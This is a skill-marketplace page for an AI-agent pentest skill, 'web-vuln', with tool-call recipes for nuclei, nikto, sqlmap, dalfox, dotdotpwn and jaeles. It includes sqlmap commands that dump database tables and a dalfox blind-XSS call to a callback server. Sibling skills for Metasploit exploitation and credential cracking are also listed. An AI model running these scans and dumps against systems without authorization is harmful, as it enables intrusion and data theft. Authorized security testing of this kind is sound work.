一键导入
web-vuln
Web vulnerability scanning workflow covering SQLi, XSS, template injection, and generic CVE detection using nuclei, sqlmap, dalfox, nikto, and jaeles
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
菜单
Web vulnerability scanning workflow covering SQLi, XSS, template injection, and generic CVE detection using nuclei, sqlmap, dalfox, nikto, and jaeles
用 Codex 或 Claude 帮你安装 复制这段 Prompt,粘贴到 Codex、Claude 或其他助手里,让它检查 Skill 页面并帮你完成安装。
基于 SOC 职业分类
Binary analysis and reverse engineering workflow using checksec, strings, binwalk, radare2, ropgadget, and gdb for CTF and vulnerability research
Cloud and container security auditing workflow using prowler, trivy, kube-hunter, and docker-bench for AWS, GCP, Azure, Kubernetes, and container images
Exploitation workflow using Metasploit, msfvenom payload generation, and Exploit-DB search — from vulnerability identification to shell
Network reconnaissance workflow using nmap, masscan, and rustscan via NyxStrike tools
Password hash identification, cracking, and credential brute-forcing using hashid, john, hashcat, hydra, medusa, and ophcrack
SMB and Windows network enumeration workflow using nmap, smbmap, enum4linux, netexec, and nbtscan for share discovery, user enumeration, and lateral movement
| name | web-vuln |
| description | Web vulnerability scanning workflow covering SQLi, XSS, template injection, and generic CVE detection using nuclei, sqlmap, dalfox, nikto, and jaeles |
Web vulnerability scanning workflow for NyxStrike. Use this skill when a user wants to find SQL injection, XSS, SSRF, misconfigurations, or run a broad CVE scan against a web target.
Start with nuclei — it covers the widest range of vulnerabilities with minimal noise.
run_tool(tool="nuclei", target="https://<target>")
Narrow by severity or tag when you want focused results:
# Critical and high only
run_tool(tool="nuclei", target="https://<target>", severity="critical,high")
# Technology-specific
run_tool(tool="nuclei", target="https://<target>", tags="wordpress,apache,nginx,php")
# Exposure checks only
run_tool(tool="nuclei", target="https://<target>", tags="exposure,misconfig")
Run nikto in parallel with or after nuclei for server-level issues (headers, default files, SSL):
run_tool(tool="nikto", target="https://<target>")
Target a specific URL with parameters. Supply POST data when needed.
# GET parameter
run_tool(tool="sqlmap", url="https://<target>/page?id=1",
additional_args="--batch --level=3 --risk=2")
# POST request
run_tool(tool="sqlmap", url="https://<target>/login",
data="username=admin&password=test",
additional_args="--batch --dbs")
Escalate once injection is confirmed:
# Dump database list
run_tool(tool="sqlmap", url="...", additional_args="--batch --dbs")
# Dump a specific table
run_tool(tool="sqlmap", url="...", additional_args="--batch -D <db> -T <table> --dump")
Run dalfox against endpoints that reflect user input:
run_tool(tool="dalfox", url="https://<target>/search?q=test")
# With blind XSS callback
run_tool(tool="dalfox", url="https://<target>/search?q=test",
blind=true,
additional_args="--blind https://<your-callback-server>")
Use when the app appears to serve files or has path parameters:
run_tool(tool="dotdotpwn", target="<target>",
additional_args="-m http -o unix")
Jaeles covers complex multi-step vulnerability chains:
run_tool(tool="jaeles", url="https://<target>")
| Finding from recon | Next tool |
|---|---|
| Login form | sqlmap (POST), dalfox |
| Search / reflect input | dalfox, xsser |
| File download param | dotdotpwn |
| WordPress | nuclei tags=wordpress |
| Generic CVE sweep | nuclei severity=critical,high |
| Old server version | nikto, nuclei |
katana or gau (from web-recon skill) into sqlmap and dalfox for wider attack surface.--batch with sqlmap to avoid interactive prompts in automated runs.tags="cve,rce,lfi" for high-impact checks only.| Tool | Use case |
|---|---|
nuclei | Template-based CVE/misconfiguration scanner |
nikto | Web server issue scanner |
sqlmap | SQL injection detection and exploitation |
dalfox | XSS scanner with blind support |
xsser | Alternative XSS scanner |
dotdotpwn | Directory traversal scanner |
jaeles | Multi-step web vulnerability framework |